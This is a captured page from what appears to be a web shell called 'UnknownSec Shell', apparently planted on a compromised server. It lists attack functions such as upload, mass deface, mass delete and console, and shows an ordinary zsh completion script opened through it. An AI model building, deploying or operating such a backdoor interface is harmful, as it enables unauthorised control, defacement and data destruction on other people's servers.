shell bypass 403
UnknownSec Shell
:
/
usr
/
share
/
zsh
/
functions
/
Completion
/
Base
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
_expand_word
#compdef -K _expand_word complete-word \C-xe _list_expansions list-choices \C-xd # Simple completion front-end implementing expansion. local curcontext="$curcontext" if [[ -z "$curcontext" ]]; then curcontext="expand-word:::" else curcontext="expand-word:${curcontext#*:}" fi _main_complete _expand
© 2026 UnknownSec